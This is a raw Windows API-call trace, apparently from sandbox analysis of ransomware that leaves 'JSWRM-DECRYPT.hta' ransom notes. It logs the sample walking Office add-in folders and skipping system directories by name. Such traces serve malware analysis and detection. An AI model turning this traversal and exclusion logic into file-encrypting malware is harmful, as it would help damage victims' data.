Flags=0x0, Size=0x14e) returned 0x21c578 [0123.010] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bad8 | out: hHeap=0x1e0000) returned 1 [0123.010] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\bg\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\bin\\bg\\jswrm-decrypt.hta")) returned 0x20 [0123.010] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0123.010] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b908 | out: hHeap=0x1e0000) returned 1 [0123.010] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b908 [0123.010] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\bg\\*.*", lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf480feb5, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x18157e1, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x3ffaaa46, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName=".", cAlternateFileName="")) returned 0x231c80 [0123.010] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0123.010] FindNextFileW (in: hFindFile=0x231c80, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf480feb5, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x18157e1, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x3ffaaa46, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="..", cAlternateFileName="")) returned 1 [0123.010] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0123.010] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0123.010] FindNextFileW (in: hFindFile=0x231c80, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3ffaaa46, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x3ffaaa46, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x3ffaaa46, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0123.010] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0123.010] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0123.011] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0123.011] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0123.011] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0123.011] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0123.011] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0123.011] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0123.011] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0123.011] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0123.011] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0123.011] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0123.011] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0123.011] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x240fe8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0123.011] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0123.011] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0123.011] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0123.011] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0123.011] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241330, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0123.011] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0123.011] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x100) returned 0x1f19f0 [0123.011] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b908 | out: hHeap=0x1e0000) returned 1 [0123.011] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0123.011] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0123.011] FindNextFileW (in: hFindFile=0x231c80, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x3f7b55, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x3f7b55, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x54ef2e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x12040, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.Mashup.Client.Excel.resources.dll", cAlternateFileName="MICROS~3.DLL")) returned 1 [0123.011] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2=".") returned 1 [0123.011] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="..") returned 1 [0123.011] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="...") returned 1 [0123.011] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="windows") returned -1 [0123.011] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="recovery") returned -1 [0123.011] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="perflogs") returned -1 [0123.011] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="documents and settings") returned 1 [0123.011] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.011] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="system volume information") returned -1 [0123.011] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="msocache") returned -1 [0123.011] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x2330f8 [0123.012] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Excel.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0123.012] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0123.012] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Excel.resources.dll", cchWideChar=43, lpMultiByteStr=0x22d260, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Client.Excel.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0123.012] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2330f8 | out: hHeap=0x1e0000) returned 1 [0123.012] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232ce8 [0123.012] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Excel.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0123.012] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0123.012] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Excel.resources.dll", cchWideChar=43, lpMultiByteStr=0x22d298, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Client.Excel.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0123.012] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232ce8 | out: hHeap=0x1e0000) returned 1 [0123.012] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x130) returned 0x21be68 [0123.012] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f19f0 | out: hHeap=0x1e0000) returned 1 [0123.012] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0123.012] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0123.012] FindNextFileW (in: hFindFile=0x231c80, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf480feb5, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf480feb5, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf483611a, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x31040, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.Mashup.Client.Windows.resources.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0123.012] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2=".") returned 1 [0123.012] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="..") returned 1 [0123.012] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="...") returned 1 [0123.012] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="windows") returned -1 [0123.012] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="recovery") returned -1 [0123.012] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="perflogs") returned -1 [0123.012] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="documents and settings") returned 1 [0123.012] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.012] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="system volume information") returned -1 [0123.012] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="msocache") returned -1 [0123.012] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232bb0 [0123.012] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Windows.resources.dll", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0123.012] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0123.012] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Windows.resources.dll", cchWideChar=45, lpMultiByteStr=0x22cdc8, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Client.Windows.resources.dll", lpUsedDefaultChar=0x0) returned 45 [0123.012] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232bb0 | out: hHeap=0x1e0000) returned 1 [0123.012] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232ef0 [0123.012] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Windows.resources.dll", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0123.012] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0123.013] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Windows.resources.dll", cchWideChar=45, lpMultiByteStr=0x22ce70, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Client.Windows.resources.dll", lpUsedDefaultChar=0x0) returned 45 [0123.013] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232ef0 | out: hHeap=0x1e0000) returned 1 [0123.013] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x130) returned 0x23aa80 [0123.013] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21be68 | out: hHeap=0x1e0000) returned 1 [0123.013] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0123.013] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0123.013] FindNextFileW (in: hFindFile=0x231c80, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x18157e1, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x18157e1, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x18157e1, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3f040, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.Mashup.Document.resources.dll", cAlternateFileName="MICROS~4.DLL")) returned 1 [0123.013] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2=".") returned 1 [0123.013] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="..") returned 1 [0123.013] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="...") returned 1 [0123.013] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="windows") returned -1 [0123.013] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="recovery") returned -1 [0123.013] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="perflogs") returned -1 [0123.013] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="documents and settings") returned 1 [0123.013] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.013] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="system volume information") returned -1 [0123.013] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="msocache") returned -1 [0123.013] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c220 [0123.013] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Document.resources.dll", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0123.013] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0123.013] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Document.resources.dll", cchWideChar=39, lpMultiByteStr=0x22d260, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Document.resources.dll", lpUsedDefaultChar=0x0) returned 39 [0123.013] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c220 | out: hHeap=0x1e0000) returned 1 [0123.013] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0123.013] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Document.resources.dll", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0123.013] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0123.013] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Document.resources.dll", cchWideChar=39, lpMultiByteStr=0x22cdc8, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Document.resources.dll", lpUsedDefaultChar=0x0) returned 39 [0123.013] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0123.013] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x130) returned 0x21be68 [0123.013] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23aa80 | out: hHeap=0x1e0000) returned 1 [0123.013] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0123.013] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0123.013] FindNextFileW (in: hFindFile=0x231c80, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf9a9d821, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf9a9d821, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf9ea37c1, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xb0aa8, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.MashupEngine.resources.dll", cAlternateFileName="MICROS~2.DLL")) returned 1 [0123.014] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2=".") returned 1 [0123.014] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="..") returned 1 [0123.014] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="...") returned 1 [0123.014] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="windows") returned -1 [0123.014] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="recovery") returned -1 [0123.014] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="perflogs") returned -1 [0123.014] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="documents and settings") returned 1 [0123.014] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.014] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="system volume information") returned -1 [0123.014] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="msocache") returned -1 [0123.014] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22be00 [0123.014] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.MashupEngine.resources.dll", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0123.014] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0123.014] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.MashupEngine.resources.dll", cchWideChar=36, lpMultiByteStr=0x22cdc8, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.MashupEngine.resources.dll", lpUsedDefaultChar=0x0) returned 36 [0123.014] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22be00 | out: hHeap=0x1e0000) returned 1 [0123.014] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0123.014] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.MashupEngine.resources.dll", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0123.014] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0123.014] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.MashupEngine.resources.dll", cchWideChar=36, lpMultiByteStr=0x22d260, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.MashupEngine.resources.dll", lpUsedDefaultChar=0x0) returned 36 [0123.014] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0123.014] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x120) returned 0x23ef08 [0123.014] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21be68 | out: hHeap=0x1e0000) returned 1 [0123.014] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0123.014] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0123.014] FindNextFileW (in: hFindFile=0x231c80, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf9a9d821, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf9a9d821, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf9ea37c1, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xb0aa8, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.MashupEngine.resources.dll", cAlternateFileName="MICROS~2.DLL")) returned 0 [0123.014] FindClose (in: hFindFile=0x231c80 | out: hFindFile=0x231c80) returned 1 [0123.014] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ef08 | out: hHeap=0x1e0000) returned 1 [0123.014] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22aff8 | out: hHeap=0x1e0000) returned 1 [0123.014] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b820 | out: hHeap=0x1e0000) returned 1 [0123.014] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1ae94c9, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x61b241f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x61b241f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x1fc8d4, cFileName="ca", cAlternateFileName="")) returned 1 [0123.014] lstrcmpiW (lpString1="ca", lpString2=".") returned 1 [0123.015] lstrcmpiW (lpString1="ca", lpString2="..") returned 1 [0123.015] lstrcmpiW (lpString1="ca", lpString2="...") returned 1 [0123.015] lstrcmpiW (lpString1="ca", lpString2="windows") returned -1 [0123.015] lstrcmpiW (lpString1="ca", lpString2="recovery") returned -1 [0123.015] lstrcmpiW (lpString1="ca", lpString2="perflogs") returned -1 [0123.015] lstrcmpiW (lpString1="ca", lpString2="documents and settings") returned -1 [0123.015] lstrcmpiW (lpString1="ca", lpString2="$RECYCLE.BIN") returned 1 [0123.015] lstrcmpiW (lpString1="ca", lpString2="system volume information") returned -1 [0123.015] lstrcmpiW (lpString1="ca", lpString2="msocache") returned -1 [0123.015] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b820 [0123.015] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22af10 | out: hHeap=0x1e0000) returned 1 [0123.015] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22aff8 [0123.015] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b1c8 [0123.015] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x21c578 [0123.015] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b1c8 | out: hHeap=0x1e0000) returned 1 [0123.015] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\ca\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\bin\\ca\\jswrm-decrypt.hta")) returned 0xffffffff [0123.018] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0123.018] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0123.018] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b0bc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0123.018] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0123.018] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x24f1e0 [0123.018] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0123.018] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x250fb0 [0123.018] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24f1e0 | out: hHeap=0x1e0000) returned 1 [0123.018] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22ad40 [0123.018] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x21c578 